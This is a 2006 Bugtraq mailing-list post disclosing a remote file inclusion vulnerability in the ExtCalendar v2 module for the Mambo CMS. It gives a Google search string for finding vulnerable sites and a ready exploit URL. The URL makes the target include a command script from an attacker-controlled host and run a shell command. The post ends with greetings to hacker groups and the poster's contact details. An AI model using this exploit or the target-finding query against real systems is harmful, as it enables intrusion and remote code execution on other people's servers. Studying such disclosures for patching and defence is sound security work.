[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
ExtCalendar Mambo Module <= v2( extcalendar.php ) Remote File Include Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ExtCalendar Mambo Module <= v2( extcalendar.php ) Remote File Include Vulnerabilities
- From: saudi.unix@xxxxxxxxxxx
- Date: 18 Jul 2006 02:26:36 -0000
--------------------------------------------------------------------------------
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
###############################################################################
Discovered By saudihackrz
-----------------------------------------------------------------------------
google : "powered by ExtCalendar v2"
Exploit :
http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls
-----------------------------------------------------------------------------
greatz:
~~~~~
SnIpEr.SA , KING18, BLACK HOURS, AL-ARAAB,
-------------------------------------------------------------------------------
Contact:
~~~~~~~
Nick: saudi hackrz
E-mail: saudi.unix[at]hotmail[dot]Com
site: http://www.3asfh.net